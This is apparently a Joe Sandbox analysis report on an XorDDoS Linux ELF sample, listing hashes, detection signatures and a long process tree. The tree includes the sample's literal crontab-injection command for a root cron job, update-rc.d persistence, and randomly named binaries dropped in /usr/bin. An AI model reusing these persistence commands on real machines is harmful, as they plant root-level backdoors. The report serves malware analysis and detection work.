Edit tour

Linux Analysis Report
UDMp3dZ7nc.elf

Overview

General Information

Sample name:	UDMp3dZ7nc.elf renamed because original name is a hash value
Original sample name:	004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828.elf
Analysis ID:	1583792
MD5:	22cd21f5cfc3ea409f3a05585d903949
SHA1:	d48c82b3ce4460930518a924a51bab5c496b38b0
SHA256:	004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828
Tags:	elfuser-malrpt
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XorDDoS Bot

Drops files in suspicious directories

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Drops files with innocent-looking names

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

PID-file does not contain an ASCII number

Reads CPU information from /proc indicative of miner or evasive malware

Reads system information from the proc file system

Sample has stripped symbol table

Sleeps for long times indicative of sandbox evasion

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583792
Start date and time:	2025-01-03 15:27:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	UDMp3dZ7nc.elf renamed because original name is a hash value
Original Sample Name:	004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/21@5/0

Warnings

VT rate limit hit for: ppp.gggatat456.com

Runtime Messages

Command:	/tmp/UDMp3dZ7nc.elf
PID:	6260
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

UDMp3dZ7nc.elf (PID: 6260, Parent: 6186, MD5: 22cd21f5cfc3ea409f3a05585d903949) Arguments: /tmp/UDMp3dZ7nc.elf

UDMp3dZ7nc.elf New Fork (PID: 6261, Parent: 6260)

UDMp3dZ7nc.elf New Fork (PID: 6262, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6263, Parent: 6262)

UDMp3dZ7nc.elf New Fork (PID: 6264, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6265, Parent: 6264)

update-rc.d (PID: 6265, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d UDMp3dZ7nc.elf defaults

update-rc.d New Fork (PID: 6271, Parent: 6265)

systemctl (PID: 6271, Parent: 6265, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

UDMp3dZ7nc.elf New Fork (PID: 6266, Parent: 6261)

sh (PID: 6266, Parent: 6261, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 6267, Parent: 6266)

sed (PID: 6267, Parent: 6266, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

UDMp3dZ7nc.elf New Fork (PID: 6293, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6294, Parent: 6293)

oigyzaiygp (PID: 6294, Parent: 6293, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp ifconfig 6261

oigyzaiygp New Fork (PID: 6295, Parent: 6294)

UDMp3dZ7nc.elf New Fork (PID: 6296, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6297, Parent: 6296)

oigyzaiygp (PID: 6297, Parent: 6296, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp pwd 6261

oigyzaiygp New Fork (PID: 6299, Parent: 6297)

UDMp3dZ7nc.elf New Fork (PID: 6298, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6300, Parent: 6298)

oigyzaiygp (PID: 6300, Parent: 6298, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp "cat resolv.conf" 6261

oigyzaiygp New Fork (PID: 6304, Parent: 6300)

UDMp3dZ7nc.elf New Fork (PID: 6301, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6302, Parent: 6301)

oigyzaiygp (PID: 6302, Parent: 6301, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp gnome-terminal 6261

oigyzaiygp New Fork (PID: 6306, Parent: 6302)

UDMp3dZ7nc.elf New Fork (PID: 6303, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6305, Parent: 6303)

oigyzaiygp (PID: 6305, Parent: 6303, MD5: 62c3a5bb687fbbf7c6618bea4daadf29) Arguments: /usr/bin/oigyzaiygp "netstat -an" 6261

oigyzaiygp New Fork (PID: 6307, Parent: 6305)

UDMp3dZ7nc.elf New Fork (PID: 6311, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6312, Parent: 6311)

sosfbbrzmx (PID: 6312, Parent: 6311, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx ifconfig 6261

sosfbbrzmx New Fork (PID: 6313, Parent: 6312)

UDMp3dZ7nc.elf New Fork (PID: 6314, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6315, Parent: 6314)

sosfbbrzmx (PID: 6315, Parent: 6314, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx sh 6261

sosfbbrzmx New Fork (PID: 6318, Parent: 6315)

UDMp3dZ7nc.elf New Fork (PID: 6316, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6317, Parent: 6316)

sosfbbrzmx (PID: 6317, Parent: 6316, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx whoami 6261

sosfbbrzmx New Fork (PID: 6321, Parent: 6317)

UDMp3dZ7nc.elf New Fork (PID: 6319, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6320, Parent: 6319)

sosfbbrzmx (PID: 6320, Parent: 6319, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx ls 6261

sosfbbrzmx New Fork (PID: 6324, Parent: 6320)

UDMp3dZ7nc.elf New Fork (PID: 6322, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6323, Parent: 6322)

sosfbbrzmx (PID: 6323, Parent: 6322, MD5: 01fd1f9249b1844a8c8d2d32cedc38b7) Arguments: /usr/bin/sosfbbrzmx top 6261

sosfbbrzmx New Fork (PID: 6325, Parent: 6323)

UDMp3dZ7nc.elf New Fork (PID: 6328, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6329, Parent: 6328)

gphlkawhxw (PID: 6329, Parent: 6328, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw "ifconfig eth0" 6261

gphlkawhxw New Fork (PID: 6330, Parent: 6329)

UDMp3dZ7nc.elf New Fork (PID: 6331, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6332, Parent: 6331)

gphlkawhxw (PID: 6332, Parent: 6331, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw uptime 6261

gphlkawhxw New Fork (PID: 6337, Parent: 6332)

UDMp3dZ7nc.elf New Fork (PID: 6333, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6334, Parent: 6333)

gphlkawhxw (PID: 6334, Parent: 6333, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw "route -n" 6261

gphlkawhxw New Fork (PID: 6340, Parent: 6334)

UDMp3dZ7nc.elf New Fork (PID: 6335, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6336, Parent: 6335)

gphlkawhxw (PID: 6336, Parent: 6335, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw ls 6261

gphlkawhxw New Fork (PID: 6341, Parent: 6336)

UDMp3dZ7nc.elf New Fork (PID: 6338, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6339, Parent: 6338)

gphlkawhxw (PID: 6339, Parent: 6338, MD5: 32baef41bef86e657cecb26ba601c8fd) Arguments: /usr/bin/gphlkawhxw who 6261

gphlkawhxw New Fork (PID: 6342, Parent: 6339)

UDMp3dZ7nc.elf New Fork (PID: 6364, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6365, Parent: 6364)

vnihfmehfy (PID: 6365, Parent: 6364, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy "cat resolv.conf" 6261

vnihfmehfy New Fork (PID: 6366, Parent: 6365)

UDMp3dZ7nc.elf New Fork (PID: 6367, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6368, Parent: 6367)

vnihfmehfy (PID: 6368, Parent: 6367, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy id 6261

vnihfmehfy New Fork (PID: 6371, Parent: 6368)

UDMp3dZ7nc.elf New Fork (PID: 6369, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6370, Parent: 6369)

vnihfmehfy (PID: 6370, Parent: 6369, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy sh 6261

vnihfmehfy New Fork (PID: 6374, Parent: 6370)

UDMp3dZ7nc.elf New Fork (PID: 6372, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6373, Parent: 6372)

vnihfmehfy (PID: 6373, Parent: 6372, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy uptime 6261

vnihfmehfy New Fork (PID: 6377, Parent: 6373)

UDMp3dZ7nc.elf New Fork (PID: 6375, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6376, Parent: 6375)

vnihfmehfy (PID: 6376, Parent: 6375, MD5: f0f21df0836e951d36bb440812753052) Arguments: /usr/bin/vnihfmehfy top 6261

vnihfmehfy New Fork (PID: 6378, Parent: 6376)

UDMp3dZ7nc.elf New Fork (PID: 6381, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6382, Parent: 6381)

eqoogeqyds (PID: 6382, Parent: 6381, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "netstat -an" 6261

eqoogeqyds New Fork (PID: 6385, Parent: 6382)

UDMp3dZ7nc.elf New Fork (PID: 6386, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6387, Parent: 6386)

eqoogeqyds (PID: 6387, Parent: 6386, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "echo \"find\"" 6261

eqoogeqyds New Fork (PID: 6389, Parent: 6387)

UDMp3dZ7nc.elf New Fork (PID: 6388, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6390, Parent: 6388)

eqoogeqyds (PID: 6390, Parent: 6388, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds whoami 6261

eqoogeqyds New Fork (PID: 6393, Parent: 6390)

UDMp3dZ7nc.elf New Fork (PID: 6391, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6392, Parent: 6391)

eqoogeqyds (PID: 6392, Parent: 6391, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "sleep 1" 6261

eqoogeqyds New Fork (PID: 6396, Parent: 6392)

UDMp3dZ7nc.elf New Fork (PID: 6394, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6395, Parent: 6394)

eqoogeqyds (PID: 6395, Parent: 6394, MD5: 4bb785727d658c24555afb2552203824) Arguments: /usr/bin/eqoogeqyds "route -n" 6261

eqoogeqyds New Fork (PID: 6397, Parent: 6395)

UDMp3dZ7nc.elf New Fork (PID: 6400, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6401, Parent: 6400)

otlzwyqefc (PID: 6401, Parent: 6400, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc whoami 6261

otlzwyqefc New Fork (PID: 6402, Parent: 6401)

UDMp3dZ7nc.elf New Fork (PID: 6403, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6404, Parent: 6403)

otlzwyqefc (PID: 6404, Parent: 6403, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc ls 6261

otlzwyqefc New Fork (PID: 6407, Parent: 6404)

UDMp3dZ7nc.elf New Fork (PID: 6405, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6406, Parent: 6405)

otlzwyqefc (PID: 6406, Parent: 6405, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc uptime 6261

otlzwyqefc New Fork (PID: 6412, Parent: 6406)

UDMp3dZ7nc.elf New Fork (PID: 6408, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6409, Parent: 6408)

otlzwyqefc (PID: 6409, Parent: 6408, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc "netstat -antop" 6261

otlzwyqefc New Fork (PID: 6413, Parent: 6409)

UDMp3dZ7nc.elf New Fork (PID: 6410, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6411, Parent: 6410)

otlzwyqefc (PID: 6411, Parent: 6410, MD5: 3cab282fbf544a8c5da93e8a6e8649d0) Arguments: /usr/bin/otlzwyqefc sh 6261

otlzwyqefc New Fork (PID: 6414, Parent: 6411)

UDMp3dZ7nc.elf New Fork (PID: 6417, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6418, Parent: 6417)

dthtwwmqvu (PID: 6418, Parent: 6417, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu ls 6261

dthtwwmqvu New Fork (PID: 6419, Parent: 6418)

UDMp3dZ7nc.elf New Fork (PID: 6420, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6421, Parent: 6420)

dthtwwmqvu (PID: 6421, Parent: 6420, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu whoami 6261

dthtwwmqvu New Fork (PID: 6424, Parent: 6421)

UDMp3dZ7nc.elf New Fork (PID: 6422, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6423, Parent: 6422)

dthtwwmqvu (PID: 6423, Parent: 6422, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu ifconfig 6261

dthtwwmqvu New Fork (PID: 6427, Parent: 6423)

UDMp3dZ7nc.elf New Fork (PID: 6425, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6426, Parent: 6425)

dthtwwmqvu (PID: 6426, Parent: 6425, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu "netstat -an" 6261

dthtwwmqvu New Fork (PID: 6430, Parent: 6426)

UDMp3dZ7nc.elf New Fork (PID: 6428, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6429, Parent: 6428)

dthtwwmqvu (PID: 6429, Parent: 6428, MD5: f0744c231fd483b8e536adaae22fed9c) Arguments: /usr/bin/dthtwwmqvu "netstat -an" 6261

dthtwwmqvu New Fork (PID: 6431, Parent: 6429)

UDMp3dZ7nc.elf New Fork (PID: 6435, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6436, Parent: 6435)

jeyjdycnpv (PID: 6436, Parent: 6435, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv "cat resolv.conf" 6261

jeyjdycnpv New Fork (PID: 6437, Parent: 6436)

UDMp3dZ7nc.elf New Fork (PID: 6438, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6439, Parent: 6438)

jeyjdycnpv (PID: 6439, Parent: 6438, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv "cd /etc" 6261

jeyjdycnpv New Fork (PID: 6442, Parent: 6439)

UDMp3dZ7nc.elf New Fork (PID: 6440, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6441, Parent: 6440)

jeyjdycnpv (PID: 6441, Parent: 6440, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv ifconfig 6261

jeyjdycnpv New Fork (PID: 6445, Parent: 6441)

UDMp3dZ7nc.elf New Fork (PID: 6443, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6444, Parent: 6443)

jeyjdycnpv (PID: 6444, Parent: 6443, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv "ps -ef" 6261

jeyjdycnpv New Fork (PID: 6448, Parent: 6444)

UDMp3dZ7nc.elf New Fork (PID: 6446, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6447, Parent: 6446)

jeyjdycnpv (PID: 6447, Parent: 6446, MD5: 874925f3383cf4d89cfb331d6357dcc4) Arguments: /usr/bin/jeyjdycnpv ls 6261

jeyjdycnpv New Fork (PID: 6449, Parent: 6447)

UDMp3dZ7nc.elf New Fork (PID: 6452, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6453, Parent: 6452)

wutujskjnm (PID: 6453, Parent: 6452, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm "grep \"A\"" 6261

wutujskjnm New Fork (PID: 6454, Parent: 6453)

UDMp3dZ7nc.elf New Fork (PID: 6455, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6456, Parent: 6455)

wutujskjnm (PID: 6456, Parent: 6455, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm "echo \"find\"" 6261

wutujskjnm New Fork (PID: 6459, Parent: 6456)

UDMp3dZ7nc.elf New Fork (PID: 6457, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6458, Parent: 6457)

wutujskjnm (PID: 6458, Parent: 6457, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm su 6261

wutujskjnm New Fork (PID: 6462, Parent: 6458)

UDMp3dZ7nc.elf New Fork (PID: 6460, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6461, Parent: 6460)

wutujskjnm (PID: 6461, Parent: 6460, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm su 6261

wutujskjnm New Fork (PID: 6465, Parent: 6461)

UDMp3dZ7nc.elf New Fork (PID: 6463, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6464, Parent: 6463)

wutujskjnm (PID: 6464, Parent: 6463, MD5: 890231c9558b66f036f3c8f7cebb5d72) Arguments: /usr/bin/wutujskjnm top 6261

wutujskjnm New Fork (PID: 6466, Parent: 6464)

UDMp3dZ7nc.elf New Fork (PID: 6471, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6472, Parent: 6471)

qxzsiorokf (PID: 6472, Parent: 6471, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf who 6261

qxzsiorokf New Fork (PID: 6473, Parent: 6472)

UDMp3dZ7nc.elf New Fork (PID: 6474, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6475, Parent: 6474)

qxzsiorokf (PID: 6475, Parent: 6474, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf sh 6261

qxzsiorokf New Fork (PID: 6478, Parent: 6475)

UDMp3dZ7nc.elf New Fork (PID: 6476, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6477, Parent: 6476)

qxzsiorokf (PID: 6477, Parent: 6476, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf "cd /etc" 6261

qxzsiorokf New Fork (PID: 6480, Parent: 6477)

UDMp3dZ7nc.elf New Fork (PID: 6479, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6481, Parent: 6479)

qxzsiorokf (PID: 6481, Parent: 6479, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf "ps -ef" 6261

qxzsiorokf New Fork (PID: 6484, Parent: 6481)

UDMp3dZ7nc.elf New Fork (PID: 6482, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6483, Parent: 6482)

qxzsiorokf (PID: 6483, Parent: 6482, MD5: d660d3565aa30310004c75f37e3fe19f) Arguments: /usr/bin/qxzsiorokf "grep \"A\"" 6261

qxzsiorokf New Fork (PID: 6485, Parent: 6483)

UDMp3dZ7nc.elf New Fork (PID: 6488, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6489, Parent: 6488)

uzqdvpyngy (PID: 6489, Parent: 6488, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy "netstat -antop" 6261

uzqdvpyngy New Fork (PID: 6490, Parent: 6489)

UDMp3dZ7nc.elf New Fork (PID: 6491, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6492, Parent: 6491)

uzqdvpyngy (PID: 6492, Parent: 6491, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy pwd 6261

uzqdvpyngy New Fork (PID: 6495, Parent: 6492)

UDMp3dZ7nc.elf New Fork (PID: 6493, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6494, Parent: 6493)

uzqdvpyngy (PID: 6494, Parent: 6493, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy gnome-terminal 6261

uzqdvpyngy New Fork (PID: 6499, Parent: 6494)

UDMp3dZ7nc.elf New Fork (PID: 6496, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6497, Parent: 6496)

uzqdvpyngy (PID: 6497, Parent: 6496, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy "ps -ef" 6261

uzqdvpyngy New Fork (PID: 6501, Parent: 6497)

UDMp3dZ7nc.elf New Fork (PID: 6498, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6500, Parent: 6498)

uzqdvpyngy (PID: 6500, Parent: 6498, MD5: 53241e7c3d48f7919dc80796d016a705) Arguments: /usr/bin/uzqdvpyngy bash 6261

uzqdvpyngy New Fork (PID: 6502, Parent: 6500)

UDMp3dZ7nc.elf New Fork (PID: 6505, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6506, Parent: 6505)

bgoiqqymph (PID: 6506, Parent: 6505, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph "ls -la" 6261

bgoiqqymph New Fork (PID: 6507, Parent: 6506)

UDMp3dZ7nc.elf New Fork (PID: 6508, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6509, Parent: 6508)

bgoiqqymph (PID: 6509, Parent: 6508, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph sh 6261

bgoiqqymph New Fork (PID: 6511, Parent: 6509)

UDMp3dZ7nc.elf New Fork (PID: 6510, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6512, Parent: 6510)

bgoiqqymph (PID: 6512, Parent: 6510, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph "sleep 1" 6261

bgoiqqymph New Fork (PID: 6515, Parent: 6512)

UDMp3dZ7nc.elf New Fork (PID: 6513, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6514, Parent: 6513)

bgoiqqymph (PID: 6514, Parent: 6513, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph ifconfig 6261

bgoiqqymph New Fork (PID: 6518, Parent: 6514)

UDMp3dZ7nc.elf New Fork (PID: 6516, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6517, Parent: 6516)

bgoiqqymph (PID: 6517, Parent: 6516, MD5: 36dfbcd1cb8fb95125af217877d82a82) Arguments: /usr/bin/bgoiqqymph who 6261

bgoiqqymph New Fork (PID: 6519, Parent: 6517)

UDMp3dZ7nc.elf New Fork (PID: 6525, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6526, Parent: 6525)

uhjkqkcgma (PID: 6526, Parent: 6525, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma pwd 6261

uhjkqkcgma New Fork (PID: 6527, Parent: 6526)

UDMp3dZ7nc.elf New Fork (PID: 6528, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6529, Parent: 6528)

uhjkqkcgma (PID: 6529, Parent: 6528, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma "cd /etc" 6261

uhjkqkcgma New Fork (PID: 6532, Parent: 6529)

UDMp3dZ7nc.elf New Fork (PID: 6530, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6531, Parent: 6530)

uhjkqkcgma (PID: 6531, Parent: 6530, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma uptime 6261

uhjkqkcgma New Fork (PID: 6535, Parent: 6531)

UDMp3dZ7nc.elf New Fork (PID: 6533, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6534, Parent: 6533)

uhjkqkcgma (PID: 6534, Parent: 6533, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma gnome-terminal 6261

uhjkqkcgma New Fork (PID: 6538, Parent: 6534)

UDMp3dZ7nc.elf New Fork (PID: 6536, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6537, Parent: 6536)

uhjkqkcgma (PID: 6537, Parent: 6536, MD5: 9d2be3b2e820cf7206aad0dc28d827dd) Arguments: /usr/bin/uhjkqkcgma "cat resolv.conf" 6261

uhjkqkcgma New Fork (PID: 6539, Parent: 6537)

UDMp3dZ7nc.elf New Fork (PID: 6542, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6543, Parent: 6542)

ksagqhmoao (PID: 6543, Parent: 6542, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao pwd 6261

ksagqhmoao New Fork (PID: 6544, Parent: 6543)

UDMp3dZ7nc.elf New Fork (PID: 6545, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6546, Parent: 6545)

ksagqhmoao (PID: 6546, Parent: 6545, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "ls -la" 6261

ksagqhmoao New Fork (PID: 6550, Parent: 6546)

UDMp3dZ7nc.elf New Fork (PID: 6547, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6548, Parent: 6547)

ksagqhmoao (PID: 6548, Parent: 6547, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "sleep 1" 6261

ksagqhmoao New Fork (PID: 6554, Parent: 6548)

UDMp3dZ7nc.elf New Fork (PID: 6549, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6551, Parent: 6549)

ksagqhmoao (PID: 6551, Parent: 6549, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "ls -la" 6261

ksagqhmoao New Fork (PID: 6555, Parent: 6551)

UDMp3dZ7nc.elf New Fork (PID: 6552, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6553, Parent: 6552)

ksagqhmoao (PID: 6553, Parent: 6552, MD5: c2be7f6f3d8a2dd22bb027877353c35f) Arguments: /usr/bin/ksagqhmoao "ls -la" 6261

ksagqhmoao New Fork (PID: 6556, Parent: 6553)

UDMp3dZ7nc.elf New Fork (PID: 6559, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6560, Parent: 6559)

snluqxjnyb (PID: 6560, Parent: 6559, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "netstat -an" 6261

snluqxjnyb New Fork (PID: 6561, Parent: 6560)

UDMp3dZ7nc.elf New Fork (PID: 6562, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6563, Parent: 6562)

snluqxjnyb (PID: 6563, Parent: 6562, MD5: b711ff9d714c1e77683e9a8cda370270) Arguments: /usr/bin/snluqxjnyb "sleep 1" 6261

snluqxjnyb New Fork (PID: 6566, Parent: 6563)

UDMp3dZ7nc.elf New Fork (PID: 6564, Parent: 6261)

UDMp3dZ7nc.elf New Fork (PID: 6565, Parent: 6564)

